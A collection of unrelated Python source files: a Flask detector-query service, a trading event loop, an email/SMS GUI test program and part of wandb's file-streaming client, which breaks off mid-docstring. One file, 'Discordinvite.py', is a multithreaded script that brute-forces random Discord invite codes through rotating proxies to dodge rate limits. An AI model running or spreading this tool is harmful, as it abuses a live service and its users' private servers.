productid = getProductId(data)
if not productid:
return ('Resource data not available', 404)
productid = productid[0]
try:
loadModel(productid)
except Exception as e:
loggerInstance.logHandledException(requestId, e)
loggerInstance.logToFile(requestId, e)
return (json.dumps({"query": txts, "results": [], "exception": str(e)}), 404)
res = json.dumps([loaded_models[productid].queryDetectors(txt_data) for txt_data in txts])
return (res, 200)
@app.route('/queryUtterances', methods=["POST"])
@cross_origin()
@authProvider()
def queryUtterancesMethod():
data = json.loads(request.data.decode('utf-8'))
requestId = data['requestId']
txt_data = data['detector_description']
existing_utterances = [str(x).lower() for x in json.loads(data['detector_utterances'])]
if not txt_data:
return ("No text provided for search", 400)
productid = getProductId(data)
if not productid:
return ('Resource type product data not available', 404)
results = {"query": txt_data, "results": []}
for product in productid:
try:
loadModel(product)
res = loaded_models[product].queryUtterances(txt_data, existing_utterances)
except Exception as e:
loggerInstance.logHandledException(requestId, e)
res = {"query": txt_data, "results": None, "exception": str(e)}
if res:
results["results"] += res["results"] if res["results"] else []
res = json.dumps(results)
return (res, 200)
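# Illustrative note (not part of the original source): /queryUtterances reads
# these fields from the JSON POST body (values hypothetical):
#   {"requestId": "...", "detector_description": "short detector summary",
#    "detector_utterances": "[\"existing phrase one\", \"existing phrase two\"]",
#    ... resource fields consumed by getProductId(...) ...}
# Note that detector_utterances arrives as a JSON-encoded string and is decoded
# with json.loads before being lower-cased.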
@app.route('/freeModel')
@cross_origin()
@authProvider()
def freeModelMethod():
productid = str(request.args.get('productId'))
freeModel(productid)
return ('', 204)
@app.route('/refreshModel', methods=["GET"])
@cross_origin()
@authProvider()
@loggingProvider(requestIdRequired=True)
def refreshModelMethod():
productid = str(request.args.get('productId')).strip()
res = "{0} - {1}".format(productid, refreshModel(productid))
return (res, 200)
|
control.py
|
from queue import PriorityQueue
from threading import Thread, Event
from peoples_advisor.event.event import ExitEvent, BaseEvent
from peoples_advisor.price.price import pricing_gen_factory
#from peoples_advisor.portfolio.portfolio import Portfolio
from peoples_advisor.signal.signal import SignalStrategy
from peoples_advisor.sizing.sizing import SizingStrategy
class Control:
def __init__(
self,
sig_strategy: SignalStrategy,
size_strategy: SizingStrategy,
backtesting=False,
):
self.run_flag = Event()
self.exit_flag = Event()
self.events = PriorityQueue()
self.backtesting = backtesting
self.pricing_stream = Thread(
target=pricing_gen_factory(self.events, self.exit_flag).gen,
daemon=True,
)
#self.portfolio = Portfolio()
self.sig_strategy = sig_strategy
self.size_strategy = size_strategy
if not self.backtesting:
self.pricing_stream.start()
def run(self):
while not self.exit_flag.is_set():
event = self.events.get(block=True)
# Event if else chain is ordered by the priority of their associated events
if event.type == "EXIT": # Exit the control program
self.exit_flag.set()
elif event.type == "START": # Start threads
self.run_flag.set()
elif event.type == "STOP":
self.run_flag.clear()
elif self.run_flag.is_set():
if event.type == "ORDER": # Pass order events to portfolio monitor maybe
pass
elif event.type == "SIGNAL": # Pass signal events to order gen
order_event = self.size_strategy.gen_order(event)
self.queue_event(order_event)
elif event.type == "PRICE": # Pass price events to signal gen
print(event)
#self.portfolio.update_price(event)
signal_event = self.sig_strategy.gen_signal(event)
self.queue_event(signal_event)
elif event.type == "QUOTE":
#self.portfolio.update_price(event)
pass
else:
pass
self.events.task_done()
def queue_event(self, event: BaseEvent = None):
if not self.exit_flag.is_set() and event is not None:
self.events.put(event)
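# Illustrative sketch (not part of the original source): wiring Control up with
# concrete strategies. SignalStrategy / SizingStrategy subclasses are assumed to
# implement gen_signal(price_event) and gen_order(signal_event) as used in run()
# above; the subclass names below are hypothetical placeholders, and the exact
# event types ("START", "EXIT") are assumed from the dispatch chain in run().
#
#   sig = MyCrossoverSignals()        # hypothetical SignalStrategy subclass
#   size = FixedFractionSizing()      # hypothetical SizingStrategy subclass
#   control = Control(sig, size, backtesting=True)
#   control.queue_event(start_event)  # some event whose .type == "START"
#   control.run()                     # drains the queue until an ExitEvent arrives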
|
test_program_for_EmailAndSMS_ReubenPython2and3Class_Generic.py
|
'''
Reuben Brewer, Ph.D.
reuben.brewer@gmail.com
www.reubotics.com
Apache 2 License
Software Revision C, 09/05/2021
Verified working on: Python 2.7 and 3 for Windows 8.1 64-bit and Raspberry Pi Buster (no Mac testing yet).
'''
__author__ = 'reuben.brewer'
from EmailAndSMS_ReubenPython2and3Class import *
from MyPrint_ReubenPython2and3Class import *
import os, sys, platform, traceback
import time, datetime
import threading
import collections
###############
if sys.version_info[0] < 3:
from Tkinter import * #Python 2
import tkFont
import ttk
else:
from tkinter import * #Python 3
import tkinter.font as tkFont #Python 3
from tkinter import ttk
###############
###############
if sys.version_info[0] < 3:
from builtins import raw_input as input
else:
from future.builtins import input as input #"sudo pip3 install future" (Python 3) AND "sudo pip install future" (Python 2)
###############
##########################################################################################################
##########################################################################################################
def getPreciseSecondsTimeStampString():
ts = time.time()
return ts
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def TestButtonResponse():
global MyPrint_ReubenPython2and3ClassObject
global USE_MYPRINT_FLAG
if USE_MYPRINT_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject.my_print("Test Button was Pressed!")
else:
print("Test Button was Pressed!")
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GUI_update_clock():
global root
global EXIT_PROGRAM_FLAG
global GUI_RootAfterCallbackInterval_Milliseconds
global USE_GUI_FLAG
global EmailAndSMS_ReubenPython2and3ClassObject
global EmailAndSMS_OPEN_FLAG
global SHOW_IN_GUI_EmailAndSMS_FLAG
global MyPrint_ReubenPython2and3ClassObject
global MYPRINT_OPEN_FLAG
global SHOW_IN_GUI_MYPRINT_FLAG
if USE_GUI_FLAG == 1:
if EXIT_PROGRAM_FLAG == 0:
#########################################################
#########################################################
#########################################################
if EmailAndSMS_OPEN_FLAG == 1 and SHOW_IN_GUI_EmailAndSMS_FLAG == 1:
EmailAndSMS_ReubenPython2and3ClassObject.GUI_update_clock()
#########################################################
#########################################################
if MYPRINT_OPEN_FLAG == 1 and SHOW_IN_GUI_MYPRINT_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject.GUI_update_clock()
#########################################################
root.after(GUI_RootAfterCallbackInterval_Milliseconds, GUI_update_clock)
#########################################################
#########################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def ExitProgram_Callback():
global root
global EXIT_PROGRAM_FLAG
global GUI_RootAfterCallbackInterval_Milliseconds
global EmailAndSMS_ReubenPython2and3ClassObject
global EmailAndSMS_OPEN_FLAG
global MyPrint_ReubenPython2and3ClassObject
global MYPRINT_OPEN_FLAG
print("Exiting all threads in test_program_for_MyPrint_ReubenPython2and3Class.")
EXIT_PROGRAM_FLAG = 1
#########################################################
if EmailAndSMS_OPEN_FLAG == 1:
EmailAndSMS_ReubenPython2and3ClassObject.ExitProgram_Callback()
#########################################################
#########################################################
if MYPRINT_OPEN_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject.ExitProgram_Callback()
#########################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GUI_Thread():
global root
global GUI_RootAfterCallbackInterval_Milliseconds
################################################# KEY GUI LINE
#################################################
root = Tk()
#################################################
#################################################
#################################################
TestButton = Button(root, text='Test Button', state="normal", width=20, command=lambda i=1: TestButtonResponse())
TestButton.grid(row=0, column=0, padx=5, pady=1)
#################################################
#################################################
root.protocol("WM_DELETE_WINDOW", ExitProgram_Callback) # Set the callback function for when the window's closed.
root.after(GUI_RootAfterCallbackInterval_Milliseconds, GUI_update_clock)
root.mainloop()
#################################################
#################################################
root.quit() #Stop the GUI thread, MUST BE CALLED FROM GUI_Thread
root.destroy() #Close down the GUI thread, MUST BE CALLED FROM GUI_Thread
#################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
if __name__ == '__main__':
#################################################
#################################################
global my_platform
if platform.system() == "Linux":
if "raspberrypi" in platform.uname(): # os.uname() doesn't work in windows
my_platform = "pi"
else:
my_platform = "linux"
elif platform.system() == "Windows":
my_platform = "windows"
elif platform.system() == "Darwin":
my_platform = "mac"
else:
my_platform = "other"
print("The OS platform is: " + my_platform)
#################################################
#################################################
#################################################
#################################################
global USE_GUI_FLAG
USE_GUI_FLAG = 1
global USE_EmailAndSMS_FLAG
USE_EmailAndSMS_FLAG = 1
global USE_MYPRINT_FLAG
USE_MYPRINT_FLAG = 1
#################################################
#################################################
#################################################
#################################################
global SHOW_IN_GUI_EmailAndSMS_FLAG
SHOW_IN_GUI_EmailAndSMS_FLAG = 1
global SHOW_IN_GUI_MYPRINT_FLAG
SHOW_IN_GUI_MYPRINT_FLAG = 1
#################################################
#################################################
#################################################
#################################################
global GUI_ROW_EmailAndSMS
global GUI_COLUMN_EmailAndSMS
global GUI_PADX_EmailAndSMS
global GUI_PADY_EmailAndSMS
global GUI_ROWSPAN_EmailAndSMS
global GUI_COLUMNSPAN_EmailAndSMS
GUI_ROW_EmailAndSMS = 0
GUI_COLUMN_EmailAndSMS = 0
GUI_PADX_EmailAndSMS = 1
GUI_PADY_EmailAndSMS = 10
GUI_ROWSPAN_EmailAndSMS = 1
GUI_COLUMNSPAN_EmailAndSMS = 1
global GUI_ROW_MYPRINT
global GUI_COLUMN_MYPRINT
global GUI_PADX_MYPRINT
global GUI_PADY_MYPRINT
global GUI_ROWSPAN_MYPRINT
global GUI_COLUMNSPAN_MYPRINT
GUI_ROW_MYPRINT = 1
GUI_COLUMN_MYPRINT = 0
GUI_PADX_MYPRINT = 1
GUI_PADY_MYPRINT = 10
GUI_ROWSPAN_MYPRINT = 1
GUI_COLUMNSPAN_MYPRINT = 1
#################################################
#################################################
#################################################
#################################################
global EXIT_PROGRAM_FLAG
EXIT_PROGRAM_FLAG = 0
global root
global GUI_RootAfterCallbackInterval_Milliseconds
GUI_RootAfterCallbackInterval_Milliseconds = 30
global EmailAndSMS_ReubenPython2and3ClassObject
global EmailAndSMS_OPEN_FLAG
EmailAndSMS_OPEN_FLAG = -1
global MyPrint_ReubenPython2and3ClassObject
global MYPRINT_OPEN_FLAG
MYPRINT_OPEN_FLAG = -1
global MainLoopThread_current_time
MainLoopThread_current_time = -11111
global MainLoopThread_starting_time
MainLoopThread_starting_time = -11111
#################################################
#################################################
################################################# KEY GUI LINE
#################################################
if USE_GUI_FLAG == 1:
print("Starting GUI thread...")
GUI_Thread_ThreadingObject = threading.Thread(target=GUI_Thread)
GUI_Thread_ThreadingObject.setDaemon(True) #Should mean that the GUI thread is destroyed automatically when the main thread is destroyed.
GUI_Thread_ThreadingObject.start()
time.sleep(0.5) #Allow enough time for 'root' to be created that we can then pass it into other classes.
else:
root = None
#################################################
#################################################
#################################################
#################################################
global EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict
global EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageCounter
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageCounter = -11111.0
global EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageTimeSeconds
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageTimeSeconds = -11111.0
global EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageType
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageType = ""
global EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageContentsDict
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageContentsDict = ""
EmailAndSMS_GUIparametersDict = dict([("USE_GUI_FLAG", USE_GUI_FLAG and SHOW_IN_GUI_EmailAndSMS_FLAG),
("root", root),
("EnableInternal_MyPrint_Flag", 1),
("NumberOfPrintLines", 10),
("UseBorderAroundThisGuiObjectFlag", 1),
("GUI_ROW", GUI_ROW_EmailAndSMS),
("GUI_COLUMN", GUI_COLUMN_EmailAndSMS),
("GUI_PADX", GUI_PADX_EmailAndSMS),
("GUI_PADY", GUI_PADY_EmailAndSMS),
("GUI_ROWSPAN", GUI_ROWSPAN_EmailAndSMS),
("GUI_COLUMNSPAN", GUI_COLUMNSPAN_EmailAndSMS)])
EmailAndSMS_setup_dict = dict([("EmailSenderAccountUsername", "SenderEmailAddress@gmail.com"),
("EmailSenderAccountPassword", "password"),
("EmailAddress_RecipientList", ["RecipientEmailAddress@gmail.com"]),
("PhoneNumber_RecipientList", ["0123456789"]),
("GUIparametersDict", EmailAndSMS_GUIparametersDict),
("TxThread_TimeToSleepEachLoop", 0.020),
("EmailAndSMS_TxMessage_Queue_MaxSize", 1000),
("TestFilesFolderFullPath", os.getcwd() + "/TestEmailAndSMSfiles")])
if USE_EmailAndSMS_FLAG == 1:
try:
EmailAndSMS_ReubenPython2and3ClassObject = EmailAndSMS_ReubenPython2and3Class(EmailAndSMS_setup_dict)
time.sleep(0.25)
EmailAndSMS_OPEN_FLAG = EmailAndSMS_ReubenPython2and3ClassObject.OBJECT_CREATED_SUCCESSFULLY_FLAG
except:
exceptions = sys.exc_info()[0]
print("EmailAndSMS_ReubenPython2and3ClassObject, exceptions: %s" % exceptions, 0)
traceback.print_exc()
#################################################
#################################################
#################################################
#################################################
if USE_MYPRINT_FLAG == 1:
MyPrint_ReubenPython2and3ClassObject_GUIparametersDict = dict([("USE_GUI_FLAG", USE_GUI_FLAG and SHOW_IN_GUI_MYPRINT_FLAG),
("root", root),
("UseBorderAroundThisGuiObjectFlag", 0),
("GUI_ROW", GUI_ROW_MYPRINT),
("GUI_COLUMN", GUI_COLUMN_MYPRINT),
("GUI_PADX", GUI_PADX_MYPRINT),
("GUI_PADY", GUI_PADY_MYPRINT),
("GUI_ROWSPAN", GUI_ROWSPAN_MYPRINT),
("GUI_COLUMNSPAN", GUI_COLUMNSPAN_MYPRINT)])
MyPrint_ReubenPython2and3ClassObject_setup_dict = dict([("NumberOfPrintLines", 10),
("WidthOfPrintingLabel", 200),
("PrintToConsoleFlag", 1),
("LogFileNameFullPath", os.getcwd() + "//TestLog.txt"),
("GUIparametersDict", MyPrint_ReubenPython2and3ClassObject_GUIparametersDict)])
try:
MyPrint_ReubenPython2and3ClassObject = MyPrint_ReubenPython2and3Class(MyPrint_ReubenPython2and3ClassObject_setup_dict)
time.sleep(0.25)
MYPRINT_OPEN_FLAG = MyPrint_ReubenPython2and3ClassObject.OBJECT_CREATED_SUCCESSFULLY_FLAG
except:
exceptions = sys.exc_info()[0]
print("MyPrint_ReubenPython2and3ClassObject __init__: Exceptions: %s" % exceptions, 0)
traceback.print_exc()
#################################################
#################################################
#################################################
#################################################
if USE_MYPRINT_FLAG == 1 and MYPRINT_OPEN_FLAG != 1:
print("Failed to open MyPrint_ReubenPython2and3ClassObject.")
input("Press any key (and enter) to exit.")
sys.exit()
#################################################
#################################################
#################################################
#################################################
if USE_EmailAndSMS_FLAG == 1 and EmailAndSMS_OPEN_FLAG != 1:
print("Failed to open EmailAndSMS_ReubenPython2and3Class.")
input("Press any key (and enter) to exit.")
sys.exit()
#################################################
#################################################
#################################################
#################################################
print("Starting main loop 'test_program_for_EmailAndSMS_ReubenPython2and3ClassObject_Generic.")
MainLoopThread_starting_time = getPreciseSecondsTimeStampString()
EmailToSendDict = dict([("Subject", "EmailFromTheMainProgram"),
("Text", "BANANA"),
("TxtFileToAttachFullFilePath", os.getcwd() + "\TestEmailAndSMSfiles\TestTxtFile.txt"),
("ExcelOrBinaryFileToAttachFullFilePath", os.getcwd() + "\TestEmailAndSMSfiles\TestExcelFile.xlsx"),
("ImageFileToAttachFullFilePath", os.getcwd() + "\TestEmailAndSMSfiles\TestImage.jpg")])
'''
for i in range(0, 1):
print(EmailAndSMS_ReubenPython2and3ClassObject.AddEmailToBeSentToAllRecipients(EmailToSendDict))
time.sleep(0.25)
print(EmailAndSMS_ReubenPython2and3ClassObject.AddSMStoBeSentToAllRecipients(dict([("Subject", "SMSfromTheMainProgram"),("Text", "SPLIT")])))
time.sleep(0.25)
'''
while(EXIT_PROGRAM_FLAG == 0):
###################################################
MainLoopThread_current_time = getPreciseSecondsTimeStampString() - MainLoopThread_starting_time
###################################################
###################################################
if USE_EmailAndSMS_FLAG == 1:
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict = EmailAndSMS_ReubenPython2and3ClassObject.GetMostRecentTxMessageDict()
if "MessageType" in EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict:
if EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict["MessageType"] != "NULL":
#print("EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict: " + str(EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict))
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageCounter = EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict["TxMessageCounter"]
print("EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageCounter" + str(EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageCounter))
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageTimeSeconds = EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict["TxMessageTimeSeconds"]
print("EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageTimeSeconds" + str(EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_TxMessageTimeSeconds))
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageType = EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict["MessageType"]
print("EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageType" + str(EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageType))
EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageContentsDict = EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict["MessageContentsDict"]
print("EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageContentsDict" + str(EmailAndSMS_ReubenPython2and3ClassObject_MostRecentRxMessageDict_MessageContentsDict))
###################################################
time.sleep(0.25)
#################################################
#################################################
print("Exiting main program 'test_program_for_EmailAndSMS_ReubenPython2and3ClassObject_Generic.")
##########################################################################################################
##########################################################################################################
|
Discordinvite.py
|
import requests, os, colorama, random, string, threading, json
from os import system
from colorama import Fore, Style
colorama.init()
def logo():
msg = Fore.LIGHTBLUE_EX +"""
.___ .__ __ __________
| | _______ _|__|/ |_ ____ \____ /
| |/ \ \/ / \ __\/ __ \ / /
| | | \ /| || | \ ___/ / /_
|___|___| /\_/ |__||__| \___ > /_______ \
\/ \/ \/
"""
print(msg)
def menu():
os.system("cls")
system("title " + "InviteZ by FGLX#9999")
logo()
print("")
print("{} ╔═══Main Menu═════════════════╗{}".format(Fore.LIGHTMAGENTA_EX, Fore.LIGHTWHITE_EX))
print(Fore.LIGHTMAGENTA_EX + " ║" + Fore.LIGHTBLUE_EX + "[1] -" + Fore.RESET + " Invite Brute Force " + Fore.LIGHTMAGENTA_EX + " ║" + Fore.RESET)
print("{} ╚═════════════════════════════╝{}".format(Fore.LIGHTMAGENTA_EX, Fore.LIGHTWHITE_EX))
hit = 0
check = 0
bad = 0
proxies = 0
def nitroNormal():
global check
global hit
global bad
global proxies
while True:
with open(txt) as f:
for line in f:
prox = line.strip("\n")
proxy = {
'https' : f'http://{prox}'
}
system("title " + "Hits:" + f'{hit}' + " Bad:" + f'{bad}' + " Checked:" + f'{check}' + " Failed Proxies:" + f'{proxies}')
code = ('').join(random.choices(string.ascii_letters + string.digits, k=codelength))
try:
r = requests.get(f"https://discord.com/api/v8/invites/"+code+"?with_counts=true", proxies=proxy, timeout=timeouttime)
if r.status_code == 200:
check += 1
hit += 1
print(Fore.GREEN+"Valid"+Fore.LIGHTWHITE_EX+" | "+Fore.BLUE+f"https://discord.gg/{code} ")
print(Fore.YELLOW+"Proxy in use "+Fore.LIGHTWHITE_EX+" | "+Fore.GREEN+f"{prox}")
with open("Good.txt", "a+") as (k):
k.writelines(f"https://discord.gg/{code}\n")
else:
check += 1
bad += 1
print(Fore.RED+"Invalid"+Fore.LIGHTWHITE_EX+" | "+Fore.BLUE+f"https://discord.gg/{code} ")
print(Fore.YELLOW+"Proxy in use "+Fore.LIGHTWHITE_EX+"|"+Fore.GREEN+f"{prox}")
with open("Bad.txt", "a+") as (f):
f.writelines(f"https://discord.gg/{code}\n")
except:
print(Fore.RED+"Proxy Failed"+Fore.LIGHTWHITE_EX+" |"+Fore.RED+f" {prox}")
proxies += 1
pass
menu()
print(Fore.LIGHTBLUE_EX)
option = int(input("[?]"))
while option != 0:
if option == 1:
os.system("cls")
logo()
txtname = input(Fore.LIGHTWHITE_EX+"["+Fore.YELLOW +"import Https Proxys:"+Fore.LIGHTWHITE_EX+"]"+Fore.LIGHTBLUE_EX)
txt = f"{txtname}.txt"
pamount = 0
with open(txt) as f:
for line in f:
prox = line.strip("\n")
pamount += 1
print(Fore.LIGHTWHITE_EX+"["+Fore.YELLOW +f"{pamount}"+Fore.LIGHTWHITE_EX+"]"+Fore.LIGHTBLUE_EX+"Proxies Loaded")
timeouttime = int(input(Fore.LIGHTWHITE_EX+"["+Fore.YELLOW +"Proxy Timeout Time:"+Fore.LIGHTWHITE_EX+"]"+Fore.LIGHTBLUE_EX))
print("Dont use more then 100 if you dont have HQ proxies")
threads = int(input(Fore.LIGHTWHITE_EX+"["+Fore.YELLOW +"Amount of Threads:"+Fore.LIGHTWHITE_EX+"]"+Fore.LIGHTBLUE_EX))
codelength = int(input(Fore.LIGHTWHITE_EX+"["+Fore.YELLOW +"Code length:"+Fore.LIGHTWHITE_EX+"]"+Fore.LIGHTBLUE_EX))
os.system("cls")
for x in range(threads):
x = threading.Thread(target=nitroNormal)
x.start()
pass
else:
print("Invalid Option")
os.system("cls")
menu()
print(Fore.LIGHTBLUE_EX)
option = int(input("[?]"))
|
file_stream.py
|
import base64
import binascii
import collections
import logging
import threading
import requests
import time
import wandb
import itertools
from six.moves import queue
from wandb import util
from wandb import env
MAX_LINE_SIZE = 4*1024*1024 - 100*1024 # imposed by back end
logger = logging.getLogger(__name__)
Chunk = collections.namedtuple('Chunk', ('filename', 'data'))
class DefaultFilePolicy(object):
def __init__(self, start_chunk_id=0):
self._chunk_id = start_chunk_id
def process_chunks(self, chunks):
chunk_id = self._chunk_id
self._chunk_id += len(chunks)
return {
'offset': chunk_id,
'content': [c.data for c in chunks]
}
class JsonlFilePolicy(object):
def __init__(self, start_chunk_id=0):
self._chunk_id = start_chunk_id
def process_chunks(self, chunks):
chunk_id = self._chunk_id
self._chunk_id += len(chunks)
chunk_data = []
for chunk in chunks:
if len(chunk.data) > MAX_LINE_SIZE:
msg = 'Metric data exceeds maximum size of {} bytes. Dropping it.'.format(MAX_LINE_SIZE)
wandb.termerror(msg, repeat=False)
util.sentry_message(msg)
else:
chunk_data.append(chunk.data)
return {
'offset': chunk_id,
'content': chunk_data,
}
class SummaryFilePolicy(object):
def process_chunks(self, chunks):
data = chunks[-1].data
if len(data) > MAX_LINE_SIZE:
msg = 'Summary data exceeds maximum size of {} bytes. Dropping it.'.format(MAX_LINE_SIZE)
wandb.termerror(msg, repeat=False)
util.sentry_message(msg)
return False
return {
'offset': 0, 'content': [data]
}
class CRDedupeFilePolicy(object):
"""File stream policy that removes characters that would be erased by
carriage returns.
This is what a terminal does. We use it for console output to reduce the
amount of data we need to send over the network (eg. for progress bars),
while preserving the output's appearance in the web app.
"""
def __init__(self, start_chunk_id=0):
self._chunk_id = start_chunk_id
def process_chunks(self, chunks):
content = []
for line in [c.data for c in chunks]:
if content and content[-1].endswith('\r'):
content[-1] = line
else:
content.append(line)
chunk_id = self._chunk_id
self._chunk_id += len(content)
if content and content[-1].endswith('\r'):
self._chunk_id -= 1
return {
'offset': chunk_id,
'content': content
}
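# Illustrative sketch, not part of the original module: how CRDedupeFilePolicy
# collapses carriage-return progress updates. It reuses the Chunk namedtuple and
# the class defined above; the log lines themselves are made-up example data.
#
#   policy = CRDedupeFilePolicy()
#   out = policy.process_chunks([Chunk('output.log', 'progress 10%\r'),
#                                Chunk('output.log', 'progress 99%\r'),
#                                Chunk('output.log', 'done\n')])
#   # out == {'offset': 0, 'content': ['done\n']} -- the two '\r' lines are
#   # overwritten, just as a terminal would erase them, so only one line is sent.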
class BinaryFilePolicy(object):
def __init__(self):
self._offset = 0
def process_chunks(self, chunks):
data = b''.join([c.data for c in chunks])
enc = base64.b64encode(data).decode('ascii')
offset = self._offset
self._offset += len(data)
return {
'offset': offset,
'content': enc,
'encoding': 'base64'
}
class FileStreamApi(object):
"""Pushes chunks of files to our streaming endpoint.
This class is used as a singleton. It has a thread that serializes access to
the streaming endpoint and performs rate-limiting and batching.
TODO: Differentiate between binary/text encoding.
"""
Finish = collections.namedtuple('Finish', ('exitcode',))
HTTP_TIMEOUT = env.get_http_timeout(10)
MAX_ITEMS_PER_PUSH = 10000
def __init__(self, api, run_id):
self._api = api
self._run_id = run_id
self._client = requests.Session()
self._client.auth = ('api', api.api_key)
self._client.timeout = self.HTTP_TIMEOUT
self._client.headers.update({
'User-Agent': api.user_agent,
'X-WANDB-USERNAME': env.get_username(),
'X-WANDB-USER-EMAIL': env.get_user_email()
})
self._file_policies = {}
self._queue = queue.Queue()
self._thread = threading.Thread(target=self._thread_body)
# It seems we need to make this a daemon thread to get sync.py's atexit handler to run, which
# cleans this thread up.
self._thread.daemon = True
self._init_endpoint()
def _init_endpoint(self):
settings = self._api.settings()
self._endpoint = "{base}/files/{entity}/{project}/{run}/file_stream".format(
base=settings['base_url'],
entity=settings['entity'],
project=settings['project'],
run=self._run_id)
def start(self):
self._init_endpoint()
self._thread.start()
def set_default_file_policy(self, filename, file_policy):
"""Set an upload policy for a file unless one has already been set.
"""
if filename not in self._file_policies:
self._file_policies[filename] = file_policy
def set_file_policy(self, filename, file_policy):
self._file_policies[filename] = file_policy
@property
def heartbeat_seconds(self):
# Defaults to 30
return self._api.dynamic_settings["heartbeat_seconds"]
def rate_limit_seconds(self):
run_time = time.time() - wandb.START_TIME
if run_time < 60:
return max(1, self.heartbeat_seconds / 15)
elif run_time < 300:
return max(2.5, self.heartbeat_seconds / 3)
else:
return max(5, self.heartbeat_seconds)
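# Worked example (comment only), assuming the default heartbeat_seconds of 30
# noted above:
#   run_time < 60s  -> max(1, 30 / 15)  = 2.0 seconds between posts
#   run_time < 300s -> max(2.5, 30 / 3) = 10.0 seconds
#   otherwise       -> max(5, 30)       = 30.0 seconds
# so the client posts frequently early in a run and backs off as the run ages.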
def _read_queue(self):
# called from the push thread (_thread_body), this does an initial read
# that'll block for up to rate_limit_seconds. Then it tries to read
# as much out of the queue as it can. We do this because the http post
# to the server happens within _thread_body, and can take longer than
# our rate limit. So next time we get a chance to read the queue we want
# to read all the stuff that queued up since last time.
#
# If we have more than MAX_ITEMS_PER_PUSH in the queue then the push thread
# will get behind and data will buffer up in the queue.
return util.read_many_from_queue(
self._queue, self.MAX_ITEMS_PER_PUSH, self.rate_limit_seconds())
def _thread_body(self):
posted_data_time = time.time()
posted_anything_time = time.time()
ready_chunks = []
finished = None
while finished is None:
items = self._read_queue()
for item in items:
if isinstance(item, self.Finish):
finished = item
else:
# item is Chunk
ready_chunks.append(item)
cur_time = time.time()
if ready_chunks and (finished or cur_time - posted_data_time > self.rate_limit_seconds()):
posted_data_time = cur_time
posted_anything_time = cur_time
self._send(ready_chunks)
ready_chunks = []
if cur_time - posted_anything_time > self.heartbeat_seconds:
posted_anything_time = cur_time
self._handle_response(util.request_with_retry(self._client.post,
self._endpoint, json={'complete': False, 'failed': False}))
# post the final close message. (item is self.Finish instance now)
util.request_with_retry(self._client.post,
self._endpoint, json={'complete': True, 'exitcode': int(finished.exitcode)})
def _handle_response(self, response):
"""Logs dropped chunks and updates dynamic settings"""
if isinstance(response, Exception):
wandb.termerror('Dropped streaming file chunk (see wandb/debug.log)')
logging.error("dropped chunk %s" % response)
raise response
elif response.json().get("limits"):
parsed = response.json()
self._api.dynamic_settings.update(parsed["limits"])
def _send(self, chunks):
# create files dict. dict of <filename: chunks> pairs where chunks is a list of
# [chunk_id, chunk_data] tuples (as lists since this will be json).
files = {}
# Groupby needs group keys to be consecutive, so sort first.
chunks.sort(key=lambda c: c.filename)
for filename, file_chunks in itertools.groupby(chunks, lambda c: c.filename):
file_chunks = list(file_chunks) # groupby returns iterator
self.set_default_file_policy(filename, DefaultFilePolicy())
files[filename] = self._file_policies[filename].process_chunks(
file_chunks)
if not files[filename]:
del files[filename]
self._handle_response(util.request_with_retry(
self._client.post, self._endpoint, json={'files': files}))
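# Illustrative payload shape (comment only, values are made up): with the
# DefaultFilePolicy above, a push of two lines of "output.log" ends up posted as
#   {"files": {"output.log": {"offset": 0, "content": ["line one\n", "line two\n"]}}}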
def stream_file(self, path):
name = path.split("/")[-1]
with open(path) as f:
done = False
first_line = next(f)
if len(first_line) > 500000:
lines_per_request = 2
elif len(first_line) > 100000:
lines_per_request = 10
elif len(first_line) > 10000:
lines_per_request = 100
elif len(first_line) > 1000:
lines_per_request = 1000
else:
lines_per_request = 10000
chunks = [Chunk(name, first_line)]
while True:
for i in range(lines_per_request - len(chunks)):
try:
line = next(f)
chunks.append(Chunk(name, line))
except StopIteration:
done = True
break
if len(chunks) > 0:
self._send(chunks)
chunks = []
if done:
break
def push(self, filename, data):
"""Push a chunk of a file to the streaming endpoint.
Args:
filename: Name of file that this is a chunk of.
data: File data.
"""
self._queue.put(Chunk(filename, data))
def finish(self, exitcode):
"""Cleans up.
Anything pushed after finish will be dropped.
Args:
